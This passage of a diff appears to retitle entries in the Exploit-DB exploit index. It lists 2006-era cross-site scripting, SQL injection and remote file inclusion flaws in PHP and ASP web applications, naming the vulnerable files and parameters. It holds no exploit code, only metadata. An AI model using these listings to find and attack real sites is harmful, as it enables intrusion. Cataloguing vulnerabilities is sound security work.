-27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - members.php id Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 +27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - 'signup.php?referral' Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 +27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - 'members.php?id' Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27792,platforms/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,php,webapps,0 27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - POS Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - 'login.php' Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps,0 -27795,platforms/php/webapps/27795.txt,"ZenPhoto 0.9/1.0 - i.php a Parameter Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 -27796,platforms/php/webapps/27796.txt,"ZenPhoto 0.9/1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 +27795,platforms/php/webapps/27795.txt,"ZenPhoto 0.9/1.0 - 'i.php?a' Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 +27796,platforms/php/webapps/27796.txt,"ZenPhoto 0.9/1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,zone14,php,webapps,0 27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 - stats.php Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 - viewcat.php Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 -27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php path' Parameter Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 +27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php?path' Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injections",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 -27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 -27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 - showpic.php preloadSlideShow Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 +27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - 'dlisting.php?cid' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 +27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 - 'showpic.php?preloadSlideShow' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 - Linkliste.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 27813,platforms/asp/webapps/27813.txt,"CyberBuild - 'login.asp' sessionid Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 27814,platforms/asp/webapps/27814.txt,"CyberBuild - browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 27815,platforms/asp/webapps/27815.txt,"CyberBuild - 'login.asp' sessionid Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27816,platforms/asp/webapps/27816.txt,"CyberBuild - browse0.htm ProductIndex Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 -27817,platforms/asp/webapps/27817.txt,"CyberBuild - result.asp Multiple Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 +27817,platforms/asp/webapps/27817.txt,"CyberBuild - 'result.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,r0t,asp,webapps,0 27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 - 'index.php' SQL Injection",2006-05-04,almaster,php,webapps,0 -27819,platforms/php/webapps/27819.txt,"CuteNews 1.4.1 - 'search.php' Multiple Parameter Cross-Site Scripting",2006-05-05,NST,php,webapps,0 +27819,platforms/php/webapps/27819.txt,"CuteNews 1.4.1 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-05,NST,php,webapps,0 27821,platforms/php/webapps/27821.html,"OpenFAQ 0.4 - Validate.php HTML Injection",2006-05-06,"Kamil Sienicki",php,webapps,0 27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 - BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps,0 27823,platforms/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps,0 27824,platforms/php/webapps/27824.txt,"Singapore 0.9.7 - 'index.php' Cross-Site Scripting",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 -27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/main.asp date Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/view.asp searchFor Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/edit.asp ID Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 -27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/main.asp date Parameter Cross-Site Scripting",2006-05-08,dj_eyes2005,asp,webapps,0 -27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script - admin.php Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 -27831,platforms/php/webapps/27831.txt,"Creative Software UK Community Portal 1.1 - ArticleView.php article_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 -27832,platforms/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 - DiscView.php forum_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 -27833,platforms/php/webapps/27833.txt,"Creative Software UK Community Portal 1.1 - Discussions.php forum_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 -27834,platforms/php/webapps/27834.txt,"Creative Software UK Community Portal 1.1 - EventView.php event_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 -27835,platforms/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple Parameter SQL Injections",2006-05-08,r0t,php,webapps,0 -27836,platforms/php/webapps/27836.txt,"Creative Software UK Community Portal 1.1 - DiscReply.php mid Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 +27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - 'admin/main.asp?date' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27826,platforms/asp/webapps/27826.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - 'admin/view.asp?searchFor' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27827,platforms/asp/webapps/27827.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - 'admin/edit.asp?ID' SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 +27828,platforms/asp/webapps/27828.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - 'admin/main.asp?date' Cross-Site Scripting",2006-05-08,dj_eyes2005,asp,webapps,0 +27829,platforms/php/webapps/27829.txt,"Phil's Bookmark Script - 'admin.php' Authentication Bypass",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 +27831,platforms/php/webapps/27831.txt,"Creative Software UK Community Portal 1.1 - 'ArticleView.php?article_id' SQL Injection",2006-05-08,r0t,php,webapps,0 +27832,platforms/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 - 'DiscView.php?forum_id' SQL Injection",2006-05-08,r0t,php,webapps,0 +27833,platforms/php/webapps/27833.txt,"Creative Software UK Community Portal 1.1 - 'Discussions.php?forum_id' SQL Injection",2006-05-08,r0t,php,webapps,0 +27834,platforms/php/webapps/27834.txt,"Creative Software UK Community Portal 1.1 - 'EventView.php?event_id' SQL Injection",2006-05-08,r0t,php,webapps,0 +27835,platforms/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple SQL Injections",2006-05-08,r0t,php,webapps,0 +27836,platforms/php/webapps/27836.txt,"Creative Software UK Community Portal 1.1 - 'DiscReply.php?mid' SQL Injection",2006-05-08,r0t,php,webapps,0 27837,platforms/php/webapps/27837.txt,"EvoTopsite 2.0 - 'index.php' Multiple SQL Injections",2006-05-08,"Hamid Ebadi",php,webapps,0 -27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php pfad' Parameter Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 -27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php pfad' Parameter Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 +27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php?pfad' Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 +27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?pfad' Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 27840,platforms/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - 'index.php' pfad Parameter Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 -27841,platforms/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 - galerie.php id Parameter Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 +27841,platforms/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php?id' Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 - showthread.php SQL Injection",2006-05-09,Breeeeh,php,webapps,0 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - Moreinfo.asp Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps,0 27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0 -27846,platforms/asp/webapps/27846.txt,"EImagePro - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 -27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 +27846,platforms/asp/webapps/27846.txt,"EImagePro - 'subList.asp?CatID' SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 +27848,platforms/php/webapps/27848.txt,"EImagePro - 'view.asp?Pic' SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - 'Results.cfm' SQL Injection",2006-04-25,r0t,cfm,webapps,0 -27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 -27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 +27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 +27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php' rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 -27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - diapo.php rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 -27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 - affich.php image Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 -27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php rep' Parameter Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 +27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - 'diapo.php?rep' Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 +27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 - 'affich.php?image' Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 +27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php?rep' Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 27868,platforms/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - CFG[popphoto_base_path] Parameter Remote File Inclusion",2006-05-15,VietMafia,php,webapps,0 -27869,platforms/php/webapps/27869.txt,"PHP Script Tools PSY Auction - item.php id Parameter SQL Injection",2006-05-15,Luny,php,webapps,0 -27870,platforms/php/webapps/27870.txt,"PHP Script Tools PSY Auction - email_request.php user_id Parameter Cross-Site Scripting",2006-05-15,Luny,php,webapps,0 +27869,platforms/php/webapps/27869.txt,"PHP Script Tools PSY Auction - 'item.php?id' SQL Injection",2006-05-15,Luny,php,webapps,0 +27870,platforms/php/webapps/27870.txt,"PHP Script Tools PSY Auction - 'email_request.php?user_id' Cross-Site Scripting",2006-05-15,Luny,php,webapps,0 27871,platforms/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,php,webapps,0 27872,platforms/php/webapps/27872.txt,"PhpVibe 3.1 - Multiple Vulnerabilities",2013-08-26,Esac,php,webapps,0 27876,platforms/php/webapps/27876.txt,"MusicBox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0 @@ -30151,13 +30152,13 @@ id,file,description,date,author,platform,type,port 27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - 'admin.php' Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps,0 27895,platforms/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - Lshop.cgi SQL Injection",2006-05-18,l0om,cgi,webapps,0 -27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 - default.asp action Parameter Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 -27897,platforms/asp/webapps/27897.txt,"ASPBB 0.5.2 - profile.asp get Parameter Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 +27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 - 'default.asp?action' Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 +27897,platforms/asp/webapps/27897.txt,"ASPBB 0.5.2 - 'profile.asp?get' Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0 27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - 'default.asp' SQL Injection",2006-05-19,omnipresent,asp,webapps,0 27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 - DC.php SQL Injection",2006-05-19,Luny,php,webapps,0 27900,platforms/php/webapps/27900.txt,"Artmedic NewsLetter 4.1 - 'Log.php' Remote Script Execution",2006-05-19,C.Schmitz,php,webapps,0 -27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x / DoceboKms 3.0.3 / Docebo CMS 3.0.x - Multiple Remote File Inclusion",2006-05-23,Kacper,php,webapps,0 -27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x - Lang Parameter Multiple Remote File Inclusion",2006-05-26,beford,php,webapps,0 +27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x / DoceboKms 3.0.3 / Docebo CMS 3.0.x - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps,0 +27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x - 'Lang' Multiple Remote File Inclusions",2006-05-26,beford,php,webapps,0 27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 - show.php SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 - Guestbook index.php Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27909,platforms/php/webapps/27909.txt,"Chipmunk Directory - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 @@ -30166,37 +30167,37 @@ id,file,description,date,author,platform,type,port 27912,platforms/php/webapps/27912.txt,"CoolPHP - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 - 'Your_Account.asp' Multiple SQL Injections",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 - 'index.php' Cross-Site Scripting",2006-05-29,black-code,php,webapps,0 -27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 - tiki-lastchanges.php Multiple Parameter Cross-Site Scripting",2006-05-29,Blwood,php,webapps,0 +27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 - 'tiki-lastchanges.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-29,Blwood,php,webapps,0 27918,platforms/asp/webapps/27918.txt,"ASPBB 0.5.2 - Perform_search.asp Cross-Site Scripting",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 27919,platforms/php/webapps/27919.txt,"Geeklog 1.4 - Multiple Input Validation Vulnerabilities",2006-05-11,trueend5,php,webapps,0 27920,platforms/php/webapps/27920.txt,"EVA-Web 2.1.2 - article-album.php3 debut_image Parameter Cross-Site Scripting",2006-05-30,r0t,php,webapps,0 27921,platforms/php/webapps/27921.txt,"EVA-Web 2.1.2 - rubrique.php3 date Parameter Cross-Site Scripting",2006-05-30,r0t,php,webapps,0 -27922,platforms/php/webapps/27922.txt,"EVA-Web 2.1.2 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-05-30,r0t,php,webapps,0 +27922,platforms/php/webapps/27922.txt,"EVA-Web 2.1.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-05-30,r0t,php,webapps,0 27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 - 'index.php' Cross-Site Scripting",2006-05-31,Jokubas,php,webapps,0 27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - 'index.php' Local File Inclusion",2006-05-31,darkgod,php,webapps,0 -27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusion",2005-05-31,ERNE,php,webapps,0 +27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusions",2005-05-31,ERNE,php,webapps,0 27928,platforms/php/webapps/27928.txt,"osTicket 1.x - 'Open_form.php' Remote File Inclusion",2006-05-31,Sweet,php,webapps,0 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 - Portal.php SQL Injection",2006-05-31,SpC-x,php,webapps,0 27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 27933,platforms/php/webapps/27933.txt,"Tekno.Portal - Bolum.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 -27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - content.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 -27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 - publication_index.php tf_lang Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 -27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 - group_index.php Multiple Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 -27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 - user_index.php tf_lastname Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 -27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 - list_index.php Multiple Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 +27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,php,webapps,0 +27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 - 'publication_index.php?tf_lang' Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 +27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 - 'group_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,php,webapps,0 +27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 - 'user_index.php?tf_lastname' Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 +27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 - 'list_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,php,webapps,0 28394,platforms/php/webapps/28394.pl,"Fusionphp Fusion News 3.7 - 'index.php' Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion",2006-06-02,brokejunker,php,webapps,0 -27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27950,platforms/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27951,platforms/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27952,platforms/php/webapps/27952.txt,"Ovidentia 5.6.x/5.8 - vacadm.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27953,platforms/php/webapps/27953.txt,"Ovidentia 5.6.x/5.8 - statart.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 +27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - 'approb.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 +27950,platforms/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - 'vacadmb.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 +27951,platforms/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - 'vacadma.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 +27952,platforms/php/webapps/27952.txt,"Ovidentia 5.6.x/5.8 - 'vacadm.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 +27953,platforms/php/webapps/27953.txt,"Ovidentia 5.6.x/5.8 - 'statart.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 +27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - 'search.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 +27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - 'posts.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 +27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - 'options.php?babInstallPath' Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0 @@ -30208,34 +30209,34 @@ id,file,description,date,author,platform,type,port 27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - 'comments.php' SQL Injection",2006-06-05,ajann,php,webapps,0 27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 - 'index.php' Cross-Site Scripting",2006-06-06,Luny,php,webapps,0 27985,platforms/php/webapps/27985.txt,"AZ Photo Album Script Pro - Cross-Site Scripting",2006-05-23,Luny,php,webapps,0 -27988,platforms/php/webapps/27988.py,"MiraksGalerie 2.62 - galimage.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 -27989,platforms/php/webapps/27989.txt,"MiraksGalerie 2.62 - galsecurity.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 -27998,platforms/php/webapps/27998.txt,"Open Business Management 1.0.3 pl1 - company_index.php Multiple Parameter Cross-Site Scripting",2006-06-07,r0t,php,webapps,0 +27988,platforms/php/webapps/27988.py,"MiraksGalerie 2.62 - 'galimage.lib.php?listconfigfile[0]' Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 +27989,platforms/php/webapps/27989.txt,"MiraksGalerie 2.62 - 'galsecurity.lib.php?listconfigfile[0]' Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 +27998,platforms/php/webapps/27998.txt,"Open Business Management 1.0.3 pl1 - 'company_index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-07,r0t,php,webapps,0 27999,platforms/php/webapps/27999.txt,"Baby Katie Media VSReal and VScal 1.0 - 'index.php' lid Parameter Cross-Site Scripting",2006-06-09,Luny,php,webapps,0 -28000,platforms/php/webapps/28000.txt,"Baby Katie Media VSReal and VScal 1.0 - myslideshow.php title Parameter Cross-Site Scripting",2006-06-09,Luny,php,webapps,0 -28002,platforms/asp/webapps/28002.txt,"KAPhotoservice 7.5 - album.asp cat Parameter Cross-Site Scripting",2006-06-09,r0t,asp,webapps,0 -28003,platforms/asp/webapps/28003.txt,"KAPhotoservice 7.5 - albums.asp albumid Parameter Cross-Site Scripting",2006-06-09,r0t,asp,webapps,0 -28004,platforms/asp/webapps/28004.txt,"KAPhotoservice 7.5 - edtalbum.asp Multiple Parameter Cross-Site Scripting",2006-06-09,r0t,asp,webapps,0 +28000,platforms/php/webapps/28000.txt,"Baby Katie Media VSReal and VScal 1.0 - 'myslideshow.php?title' Cross-Site Scripting",2006-06-09,Luny,php,webapps,0 +28002,platforms/asp/webapps/28002.txt,"KAPhotoservice 7.5 - 'album.asp?cat' Cross-Site Scripting",2006-06-09,r0t,asp,webapps,0 +28003,platforms/asp/webapps/28003.txt,"KAPhotoservice 7.5 - 'albums.asp?albumid' Cross-Site Scripting",2006-06-09,r0t,asp,webapps,0 +28004,platforms/asp/webapps/28004.txt,"KAPhotoservice 7.5 - 'edtalbum.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-06-09,r0t,asp,webapps,0 28006,platforms/php/webapps/28006.txt,"NPDS 5.10 - Multiple Input Validation Vulnerabilities",2006-06-12,DarkFig,php,webapps,0 28008,platforms/php/webapps/28008.txt,"Adaptive Website Framework 1.11 - Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 -28009,platforms/php/webapps/28009.txt,"Five Star Review Script - index2.php sort Parameter Cross-Site 